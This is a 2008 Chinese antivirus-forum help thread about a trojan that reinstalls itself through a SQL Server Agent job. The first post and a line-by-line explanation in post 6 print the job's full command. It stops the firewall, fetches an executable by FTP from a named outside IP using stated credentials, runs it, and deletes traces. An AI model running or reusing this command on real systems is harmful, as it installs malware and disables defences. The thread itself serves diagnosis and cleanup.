瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 一个史上最顽固超阴超狠的SQL木马!

12   1  /  2  页   跳转

[求助] 一个史上最顽固超阴超狠的SQL木马!

收藏
本主题由 版主 天月来了 于 2009-5-2 15:05:04 执行 关闭主题/取消 操作
非典型蚊子
头像
拙长孩提狮
  • 帖子:35
  • 注册: 2003-09-28
  • 来自:
发表于: 2008-09-09 15:25 | 只看楼主 短消息 资料
字号: 1楼

一个史上最顽固超阴超狠的SQL木马!

中了一个史上最顽固超阴超狠的SQL木马!

这个木马最特别的地方,就是查不出来源,删除了一样会复活。

重装win2003和SQL SERVER都没用。

这个木马的整个流程:  木马源(不知道在什么地方)——自动运行SQL server Agent——生成名字叫“X”的自动作业——x通过运行ftp.exe,自动链接到222.208.183.101 下载木马——运行DoIt.bat安装木马,然后自动删除DoIt.bat


其中名字叫“X”的自动作业执行的指令是:

Cmd.exe /c del ias\ias.mdb&del ias\dnary.mdb&Start net1 stop sharedaccess&Md str312146&Cd str312146&Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F&Echo Open 222.208.183.101 >k.w&echo admin >>k.w&echo 123456 >>k.w&echo get guojing7.exe
>>k.w&echo bye >>k.w&ftp -i -s:k.w&del k.w&Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N&echo for %%i in (*.exe) do start %%i>DoIt.bat&ping -n 10 127.0.0.1&DoIt.bat&del DoIt.bat&&del *.* /f /s /q

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; GoogleT5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MCDZ_V1_00-19-21-58-36-42; TheWorld)
分享到:
gototop
 
非典型蚊子
头像
拙长孩提狮
  • 帖子:35
  • 注册: 2003-09-28
  • 来自:
发表于: 2008-09-09 15:27 | 只看楼主 短消息 资料
字号: 2楼

回复: 一个史上最顽固超阴超狠的SQL木马!

您查询的IP:222.208.183.101

本站主数据:四川省眉山市 电信 参考数据一:四川省眉山市 电信 参考数据二:四川省眉山市 电信

估计是黑客控制的一个肉鸡。

ftp://admin:123456@222.208.183.101

登陆上去看到:


这个就是木马的老巢了!里面的木马每天都出新变种!
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2008-09-09 15:30 | 短消息 资料
字号: 3楼

回复:一个史上最顽固超阴超狠的SQL木马!

重装win2003和SQL SERVER都没用。

这一般是这样情况

一是电脑内没处理完

二是局域网内还有其他电脑有毒没清理

三是继续上了自以为没问题的网站
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 
非典型蚊子
头像
拙长孩提狮
  • 帖子:35
  • 注册: 2003-09-28
  • 来自:
发表于: 2008-09-09 15:32 | 只看楼主 短消息 资料
字号: 4楼

回复:一个史上最顽固超阴超狠的SQL木马!

现在唯一想不明白的,就是SQL server Agent里面的“X”是怎么生成的?由谁生成?是某个存储过程吗?
gototop
 
非典型蚊子
头像
拙长孩提狮
  • 帖子:35
  • 注册: 2003-09-28
  • 来自:
发表于: 2008-09-09 15:36 | 只看楼主 短消息 资料
字号: 5楼

回复: 一个史上最顽固超阴超狠的SQL木马!



引用:
原帖由 天月来了 于 2008-9-9 15:30:00 发表
重装win2003和SQL SERVER都没用。

这一般是这样情况

一是电脑内没处理完

二是局域网内还有其他电脑有毒没清理

三是继续上了自以为没问题的网站




1,    C盘是格式化之后再重装的,同样版本的SQL和2003在其他电脑上使用是正常的。其他盘扫描过没有发现病毒。当然不排除病毒隐藏得特别好。
2,  单机拨号上网,不是局域网。
3,  重装当天检查过SQL server Agent,完全正常,第二天上网就发现又多了个“X”,但是只上过QQ.com,没上过其他网站。QQ.com应该是没问题的,因为其他人的电脑上都没事情。排除是网站带来的病毒。
最后编辑非典型蚊子 最后编辑于 2008-09-09 15:37:29
gototop
 
非典型蚊子
头像
拙长孩提狮
  • 帖子:35
  • 注册: 2003-09-28
  • 来自:
发表于: 2008-09-09 15:49 | 只看楼主 短消息 资料
字号: 6楼

回复: 一个史上最顽固超阴超狠的SQL木马!

Cmd.exe /c del ias\ias.mdb&  删除system32\ias\ias.mdb (用于储存远程访问策略)
del ias\dnary.mdb&  删除system32\ias\dnary.mdb (IAS 日志文件)
Start net1 stop sharedaccess&  关闭(Intemet连接共享和防火墙服务)。
Md str312146&  建立文件夹str312146
Cd str312146&  进入文件夹str312146
Cacls %windir%\system32 \ftp.exe /c /e /p EveryOne:F&  修改ftp.exe权限为EveryOne完全控制
Echo Open 222.208.183.101 >k.w&      生成k.w文件,内容是“Open 222.208.183.101” 
echo admin >>k.w&    用户名
echo 123456 >>k.w&    密码
echo get guojing7.exe >>k.w&    下载guojing7.exe
echo bye >>k.w&    退出FTP
ftp -i -s:k.w&  运行ftp命令
del k.w&  删除k.w文件
Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N&  恢复ftp.exe权限为正常
echo for %%i in (*.exe) do start %%i>DoIt.bat&  生成DoIt.bat文件,内容是执行当前目录的所有exe 文件
ping -n 10 127.0.0.1&  使用ping命令,检查本机是否启动了网络服务
DoIt.bat&  运行DoIt.bat
del DoIt.bat&&  删除DoIt.bat
del *.* /f /s /q  删除生成的所有临时文件。
gototop
 
jacketary
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-09-11
  • 来自:
发表于: 2008-09-11 07:22 | 短消息 资料
字号: 7楼

回复:一个史上最顽固超阴超狠的SQL木马!

这个我也中了。。。。而且状况跟lz一模一样。木马生成过程都一样。。。木马源找不到
(应该是新型木马瑞星的病毒库了没有这个)
最近在网上查了一下发现中这个的都是9月份以后才中的(至少发帖子的时候都是9月份)
gototop
 
763691
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-09-17
  • 来自:
发表于: 2008-09-17 20:54 | 短消息 资料
字号: 8楼

回复:一个史上最顽固超阴超狠的SQL木马!

你把SQLSERVER密码修改下看 把里面的作业删除看下  我今天也中了
gototop
 
魔法学徒
头像
卡卡技术团队
  • 帖子:11465
  • 注册: 2004-10-03
  • 来自:
发表于: 2008-09-17 21:39 | 短消息 资料
字号: 9楼

回复:一个史上最顽固超阴超狠的SQL木马!

用 sql注入攻击 做关键字在google搜索,然后根据你自己机器的实际情况比对
gototop
 
sizhitao22
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2008-12-15
  • 来自:
发表于: 2008-12-15 20:38 | 短消息 资料
字号: 10楼

回复:一个史上最顽固超阴超狠的SQL木马!

我想知道如何来处理这个问题
我的电脑也中了此病毒,重装系统根本就不起作用。
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT